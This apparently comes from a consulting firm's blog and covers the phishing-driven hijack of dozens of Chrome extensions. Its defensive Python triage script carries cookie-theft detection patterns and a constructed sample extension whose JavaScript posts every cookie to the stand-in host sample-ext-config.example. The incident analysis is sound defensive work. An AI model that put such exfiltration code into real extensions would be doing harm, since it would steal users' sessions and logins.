35+ Browser Extensions Compromised

Today, we're diving into a concerning development that has recently shaken the cyber world: the hijacking of more than 35 Google Chrome extensions, affecting roughly 2.6 million users. The incident is a stark reminder that a trusted distribution channel is only as safe as the accounts that publish to it.

The Attack Unveiled

The attackers ran a phishing campaign whose emails impersonated Google Chrome Web Store Developer Support, claiming a policy violation that put the recipient's extension at risk of removal.

Their objective?

To get extension publishers to authorize an attacker-controlled OAuth application with permission to manage their Chrome Web Store items. The developer signs in to Google normally, MFA included, and then clicks "Allow" on a legitimate Google consent screen. Because the resulting OAuth token is issued to the authorized application, the attacker can publish on the developer's behalf without ever facing an MFA challenge; MFA is not broken here, it is sidestepped.

Once the attackers held these permissions, they uploaded malicious versions of the targeted extensions to the Google Chrome Web Store. The injected JavaScript aimed to exfiltrate sensitive information, including user session tokens, cookies, and login credentials, with a particular focus on social media accounts and Facebook Ads dashboards.

Who Was Impacted?

The affected extensions span a wide range of categories, from VPN services and AI-powered browser integrations to productivity tools. Among the compromised were popular names such as "AI Assistant," "VPNCity," "Reader Mode," and "Web Mirror." The scale and coordination of the campaign show that the attackers were targeting the publishing accounts themselves, not any one extension.

The Technical Breakdown

Cyberhaven, a data protection company, was one of the first to identify the breach and confirmed that its own extension was compromised on Christmas Eve. During the investigation, Cyberhaven found command and control (C2) domains hard-coded in the malicious JavaScript files. These domains served remote configuration downloads and received the exfiltrated data. Hard-coded domains are also the most practical indicator for defenders: they can be blocked at DNS and searched for in proxy and DNS logs to find affected hosts.

Threat Model

Here's a quick breakdown of the steps involved in this attack:

  1. Phishing Campaign Initiation: Attackers send deceptive emails to extension developers.

  2. OAuth Permission Granting: Developers are tricked into granting permissions.

  3. Malicious Code Injection: Malicious versions of extensions are uploaded.

  4. User Installation/Update: Chrome's automatic extension updates deliver the compromised version to existing users without any action on their part.

  5. Data Exfiltration: Sensitive information is stolen.

  6. Remote Command and Control: C2 domains allow further exploitation.
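The technical breakdown and the threat model above describe the shape of the malicious update: a broad permission set, code that reads cookies or session material, and a hard-coded external endpoint for configuration and exfiltration. The following is an added example, not Cyberhaven's tooling or anything published with the incident, of how a responder can triage an unpacked extension directory offline for exactly those indicators. The risky-permission list, the allow-listed Google hosts, the sample extension it builds and the domain `sample-ext-config.example` are all assumptions constructed for the example.

```python
"""Offline triage of an unpacked Chrome extension for the indicators this
incident showed: cookie/session access, broad host permissions and
hard-coded remote endpoints.  Added example; not the incident's own tooling."""
import json
import re
import tempfile
from pathlib import Path
from urllib.parse import urlparse

# Permissions that grant access to cookies, session material or every site (assumed list).
RISKY_PERMISSIONS = {"cookies", "webRequest", "webRequestBlocking",
                     "scripting", "tabs", "<all_urls>"}

# Source patterns that read session material or talk to the network.
SOURCE_PATTERNS = {
    "reads document.cookie": re.compile(r"document\.cookie"),
    "enumerates cookies via chrome.cookies": re.compile(r"chrome\.cookies\.get(All)?\b"),
    "reads web storage": re.compile(r"\b(local|session)Storage\.getItem"),
    "network call": re.compile(r"\b(fetch|XMLHttpRequest|navigator\.sendBeacon)\b"),
}
URL_RE = re.compile(r"https?://[A-Za-z0-9.-]+(?::\d+)?(?:/[^\s'\"`)]*)?")

# Endpoints an extension may legitimately contact (assumed); everything else is reported.
ALLOWED_HOSTS = {"clients2.google.com", "chrome.google.com", "www.google.com"}


def risky_permissions(manifest: dict) -> set[str]:
    """Return the manifest permissions that matter for session theft."""
    declared = set(manifest.get("permissions", [])) | set(manifest.get("host_permissions", []))
    for cs in manifest.get("content_scripts", []):
        declared |= set(cs.get("matches", []))
    return declared & RISKY_PERMISSIONS


def external_hosts(source: str) -> set[str]:
    """Hostnames hard-coded in extension JavaScript, minus the allow-list."""
    hosts = {urlparse(m.group(0)).hostname for m in URL_RE.finditer(source)}
    return {h for h in hosts if h and h not in ALLOWED_HOSTS}


def source_findings(source: str) -> list[str]:
    """Names of the SOURCE_PATTERNS that occur in one JavaScript file."""
    return [name for name, rx in SOURCE_PATTERNS.items() if rx.search(source)]


def triage_extension(ext_dir: Path) -> dict:
    """Scan one unpacked extension directory and return the evidence found."""
    manifest = json.loads((ext_dir / "manifest.json").read_text(encoding="utf-8"))
    report = {"name": manifest.get("name", "?"), "version": manifest.get("version", "?"),
              "risky_permissions": sorted(risky_permissions(manifest)),
              "external_hosts": set(), "source_findings": {}}
    for js in sorted(ext_dir.rglob("*.js")):
        text = js.read_text(encoding="utf-8", errors="replace")
        hits = source_findings(text)
        if hits:
            report["source_findings"][js.name] = hits
        report["external_hosts"] |= external_hosts(text)
    report["external_hosts"] = sorted(report["external_hosts"])
    # Verdict: session/cookie access plus an unknown outbound host is the exfiltration shape.
    session_access = any(h != "network call"
                         for hits in report["source_findings"].values() for h in hits)
    report["suspicious"] = bool(report["external_hosts"]) and session_access
    return report


def build_sample_extension(root: Path) -> Path:
    """Write a CONSTRUCTED extension that mimics the shape of the malicious update.
    The domain below is invented for this example (reserved .example TLD)."""
    ext = root / "sample_ext"
    ext.mkdir()
    (ext / "manifest.json").write_text(json.dumps({
        "manifest_version": 3, "name": "Sample Reader", "version": "24.10.4",
        "permissions": ["cookies", "storage"], "host_permissions": ["<all_urls>"],
        "background": {"service_worker": "worker.js"},
    }), encoding="utf-8")
    (ext / "worker.js").write_text(
        "fetch('https://sample-ext-config.example/cfg').then(r => r.json()).then(cfg =>\n"
        "  chrome.cookies.getAll({domain: cfg.target}, c =>\n"
        "    fetch('https://sample-ext-config.example/u', "
        "{method: 'POST', body: JSON.stringify(c)})));\n", encoding="utf-8")
    return ext


def demo() -> dict:
    """Build the constructed sample in a temporary directory and triage it."""
    with tempfile.TemporaryDirectory() as tmp:
        return triage_extension(build_sample_extension(Path(tmp)))


if __name__ == "__main__":
    print(json.dumps(demo(), indent=2))
```

To run it against a real installation, point `triage_extension` at a directory under the Chrome profile's `Extensions` folder (one subdirectory per extension ID, then per version) and review the reported hosts by hand: a reported host is a lead for DNS and proxy log searches, not proof of compromise, and a legitimate extension with its own backend will show up here too.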

In Conclusion

This incident underscores the importance of rigorous security practices for both developers and users. Extension publishers should review the third-party applications authorized on their Google accounts and revoke any they do not recognize, since an OAuth grant survives a password change and an MFA challenge alike. Users and administrators should check which extensions updated around the affected dates and rotate any sessions those extensions could have read. While it is possible to navigate the digital world solo, when your business or assets are at risk it is always better to involve trusted security professionals. At LMS Solutions Consulting we provide powerful tools and policies to prevent outcomes such as this.

As always, stay safe and remain vigilant. If you have any concerns or need further insights, feel free to reach out. Together, we can navigate these digital threats and fortify our defenses.

Stay secure,

Luke Stephenson
